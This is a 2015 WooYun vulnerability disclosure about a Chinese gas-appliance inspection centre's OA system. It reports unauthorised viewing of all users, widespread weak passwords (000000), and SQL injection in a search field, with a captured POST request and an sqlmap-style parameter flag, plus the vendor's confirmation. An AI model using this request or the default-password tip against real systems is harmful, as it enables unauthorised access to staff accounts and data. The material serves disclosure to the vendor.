国家燃气用具质量监督检验中心OA系多处漏洞打包(大量用户存在弱口令)

漏洞概要

缺陷编号:WooYun-2015-097953

漏洞标题:国家燃气用具质量监督检验中心OA系多处漏洞打包(大量用户存在弱口令)

相关厂商:国家燃气用具质量监督检验中心

漏洞作者:路人甲

提交时间:2015-02-26 10:53

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-02-26: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

2

详细说明:

详情请看http://**.**.**.**/bugs/wooyun-2015-097913漏洞1:越权查看OA系统所有用户http://**.**.**.**/new/List_Admin.aspx?type=10

问题的关键是很多人的密码是000000

漏洞2:sql注入 就在这个页面的搜索处

抓包的数据http://**.**.**.**/new/List_Admin.aspx?type=10 --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyMTQxNDk0MzMPZBYCZg9kFgQCCQ8WAh4LXyFJdGVtQ291bnQCHhY8Zg9kFgRmDxUHCW5hbWU9J3h0JwMyODMDMjgzCeWImOi0teW3nRDmo4DmtYvlrqQx5Lq65ZGYEDIwMTUvMS81IDk6NTQ6MTMUVXNlcl9BZGQuYXNweD9pZD0yODNkAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAzI4M2RkAgEPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMjUyAzI1MgbmnY7ok5MW5qOA5rWL5a6k6aKG5a%2B8MeWKqeeQhhAyMDE1LzIvNiA4OjUxOjU0FFVzZXJfQWRkLmFzcHg%2FaWQ9MjUyZAIBDw8WAh8BBQMyNTJkZAICD2QWBGYPFQcJbmFtZT0neHQnAzIyMwMyMjMG5byg5Y2OEOajgOa1i%2BWupDHkurrlkZgRMjAxNS8yLzE1IDk6MTU6NDkUVXNlcl9BZGQuYXNweD9pZD0yMjNkAgEPDxYCHwEFAzIyM2RkAgMPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMjA5AzIwOQnmnajmlofph48Q5qOA5rWL5a6kMuS6uuWRmBIyMDE1LzIvMTEgMTk6MjI6MDEUVXNlcl9BZGQuYXNweD9pZD0yMDlkAgEPDxYCHwEFAzIwOWRkAgQPZBYEZg8VBwluYW1lPSd4dCcDMTkzAzE5Mwnkuo7lpo3lpo0J5Yqe5YWs5a6kETIwMTQvNy85IDExOjMyOjUwFFVzZXJfQWRkLmFzcHg%2FaWQ9MTkzZAIBDw8WAh8BBQMxOTNkZAIFD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAzE4OAMxODgP5peg6L6F5qOA5Lq65ZGYEOajgOa1i%2BWupDLkurrlkZgAFFVzZXJfQWRkLmFzcHg%2FaWQ9MTg4ZAIBDw8WAh8BBQMxODhkZAIGD2QWBGYPFQcJbmFtZT0neHQnAzE4NwMxODcD5pegEOajgOa1i%2BWupDHkurrlkZgAFFVzZXJfQWRkLmFzcHg%2FaWQ9MTg3ZAIBDw8WAh8BBQMxODdkZAIHD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAzE0MQMxNDEG6ZmI56iLEOajgOa1i%2BWupDHkurrlkZgSMjAxNC84LzE3IDIyOjIzOjA0FFVzZXJfQWRkLmFzcHg%2FaWQ9MTQxZAIBDw8WAh8BBQMxNDFkZAIID2QWBGYPFQcJbmFtZT0neHQnAzE0MAMxNDAJ5p2o5Zu95by6EOajgOa1i%2BWupDHkurrlkZgRMjAxNS8xLzI3IDk6MDk6MzkUVXNlcl9BZGQuYXNweD9pZD0xNDBkAgEPDxYCHwEFAzE0MGRkAgkPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTM2AzEzNgbkvZXlt6UQ5qOA5rWL5a6kMeS6uuWRmBEyMDE0LzUvMjYgOTo1NTozMhRVc2VyX0FkZC5hc3B4P2lkPTEzNmQCAQ8PFgIfAQUDMTM2ZGQCCg9kFgRmDxUHCW5hbWU9J3h0JwMxMjUDMTI1BumZiOa1qRDmo4DmtYvlrqQy5Lq65ZGYEDIwMTUvMi82IDk6MTM6MzcUVXNlcl9BZGQuYXNweD9pZD0xMjVkAgEPDxYCHwEFAzEyNWRkAgsPZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTI0AzEyNAbnmq7mtIsQ5qOA5rWL5a6kMuS6uuWRmBIyMDE1LzIvMTAgMTQ6Mjc6MDkUVXNlcl9BZGQuYXNweD9pZD0xMjRkAgEPDxYCHwEFAzEyNGRkAgwPZBYEZg8VBwluYW1lPSd4dCcDMTIzAzEyMwnlvKDkuYPmlrkQ5qOA5rWL5a6kMuS6uuWRmBIyMDE0LzcvMTEgMTU6MjU6MTIUVXNlcl9BZGQuYXNweD9pZD0xMjNkAgEPDxYCHwEFAzEyM2RkAg0PZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTE2AzExNgnkuo7mtKrmoLkQ5qOA5rWL5a6kMeS6uuWRmBIyMDEyLzExLzUgMTU6NTE6MzcUVXNlcl9BZGQuYXNweD9pZD0xMTZkAgEPDxYCHwEFAzExNmRkAg4PZBYEZg8VBwluYW1lPSd4dCcDMTE1AzExNQnpmYjmtKXolYoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzIvMTAgMTU6MTQ6NDAUVXNlcl9BZGQuYXNweD9pZD0xMTVkAgEPDxYCHwEFAzExNWRkAg8PZBYEZg8VBycgbmFtZT0neHQyJyBzdHlsZT0nYmFja2dyb3VuZDojYWRkN2VmOycDMTE0AzExNAnmnajkuL3mnbAQ5qOA5rWL5a6kMeS6uuWRmBIyMDE0LzExLzUgMTE6Mzg6MjcUVXNlcl9BZGQuYXNweD9pZD0xMTRkAgEPDxYCHwEFAzExNGRkAhAPZBYEZg8VBwluYW1lPSd4dCcDMTEyAzExMgbniZvniocQ5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzIvOSAxNTozODozNRRVc2VyX0FkZC5hc3B4P2lkPTExMmQCAQ8PFgIfAQUDMTEyZGQCEQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI2MgI2MgnmnY7mlofnoZUJ5Yqe5YWs5a6kEzIwMTIvMTIvMTggMTU6MjI6NTETVXNlcl9BZGQuYXNweD9pZD02MmQCAQ8PFgIfAQUCNjJkZAISD2QWBGYPFQcJbmFtZT0neHQnAjYxAjYxBuW8oOWGmxDmo4DmtYvlrqQx5Lq65ZGYETIwMTUvMi82IDE0OjU0OjM2E1VzZXJfQWRkLmFzcHg%2FaWQ9NjFkAgEPDxYCHwEFAjYxZGQCEw9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI2MAI2MAnliJjljZrkuKUQ5qOA5rWL5a6kMeS6uuWRmBMyMDE0LzEyLzE2IDE1OjEwOjA0E1VzZXJfQWRkLmFzcHg%2FaWQ9NjBkAgEPDxYCHwEFAjYwZGQCFA9kFgRmDxUHCW5hbWU9J3h0JwI1OQI1OQnovpvnq4vliJoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzIvMTQgMTA6NDk6NTkTVXNlcl9BZGQuYXNweD9pZD01OWQCAQ8PFgIfAQUCNTlkZAIVD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAjU4AjU4Bumtj%2BiMuRDmo4DmtYvlrqQx5Lq65ZGYEjIwMTUvMi8xMyAxMDoxMjoxNhNVc2VyX0FkZC5hc3B4P2lkPTU4ZAIBDw8WAh8BBQI1OGRkAhYPZBYEZg8VBwluYW1lPSd4dCcCNTcCNTcJ5byg5bu65rW3EOajgOa1i%2BWupDHkurrlkZgSMjAxNS8yLzEwIDE2OjI3OjUwE1VzZXJfQWRkLmFzcHg%2FaWQ9NTdkAgEPDxYCHwEFAjU3ZGQCFw9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI1NgI1Ngbpvpnpo54Q5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzEvMjMgODo0ODo1MRNVc2VyX0FkZC5hc3B4P2lkPTU2ZAIBDw8WAh8BBQI1NmRkAhgPZBYEZg8VBwluYW1lPSd4dCcCNTUCNTUJ5L2V6LS16b6ZEOajgOa1i%2BWupOmihuWvvDESMjAxNS8yLzE0IDEyOjE0OjIzE1VzZXJfQWRkLmFzcHg%2FaWQ9NTVkAgEPDxYCHwEFAjU1ZGQCGQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI1MwI1MwnmvZjnv6Dmma8Q5qOA5rWL5a6kMeS6uuWRmBEyMDE1LzIvMTQgOTozMTo0ORNVc2VyX0FkZC5hc3B4P2lkPTUzZAIBDw8WAh8BBQI1M2RkAhoPZBYEZg8VBwluYW1lPSd4dCcCNTICNTIJ5byg5oyv5YiaEOajgOa1i%2BWupDHkurrlkZgRMjAxNS8yLzExIDk6MDI6MTQTVXNlcl9BZGQuYXNweD9pZD01MmQCAQ8PFgIfAQUCNTJkZAIbD2QWBGYPFQcnIG5hbWU9J3h0Micgc3R5bGU9J2JhY2tncm91bmQ6I2FkZDdlZjsnAjUxAjUxBumrmOehlRDmo4DmtYvlrqQx5Lq65ZGYETIwMTUvMi8xMCA5OjE5OjMwE1VzZXJfQWRkLmFzcHg%2FaWQ9NTFkAgEPDxYCHwEFAjUxZGQCHA9kFgRmDxUHCW5hbWU9J3h0JwI1MAI1MAnluLjljY7liKkQ5qOA5rWL5a6kMeS6uuWRmBAyMDE1LzIvMyA4OjI5OjE3E1VzZXJfQWRkLmFzcHg%2FaWQ9NTBkAgEPDxYCHwEFAjUwZGQCHQ9kFgRmDxUHJyBuYW1lPSd4dDInIHN0eWxlPSdiYWNrZ3JvdW5kOiNhZGQ3ZWY7JwI0OQI0OQbpmYjlspoQ5qOA5rWL5a6kMeS6uuWRmBIyMDE1LzEvMjkgMTI6MzQ6MzUTVXNlcl9BZGQuYXNweD9pZD00OWQCAQ8PFgIfAQUCNDlkZAILDw8WAh4LUmVjb3JkY291bnQCLmRkZMtMwkXB0AvPOy9aTqi%2FABPMikLC&__EVENTVALIDATION=%2FwEWIgKi4%2FOjDgLynKKsDwKa%2FIipBgKZ7YzdCgKlkPryBQKlkK7CDQKlkMK4DwKlkNauAQKlkMrLDQKlkL7oCQKlkNLeCwKlkObUDQKlkNpWAqWQjsEBAvSt5osCAvStmtsJAvStrtELAvStwscNAvSttuQJAvStqoEGAvStvvcHAvSt0u0JAvStxu8MAvSt%2BtkNAsOw6YYJAsOwnVYCw7CxzAICw7DFwgQCw7C5XwLDsK38DALDsMHyDgLDsNVoAsOwyeoDAsOw%2FdQEdu1X4jVGkiE21yJL66ZWA%2B60Sac%3D&ids=&txtloginname=s&txtSearch=+" -p txtloginname

漏洞证明:

22

修复方案:

你们懂

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-0215:36

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给相关单位通报。

最新状态:

暂无

评价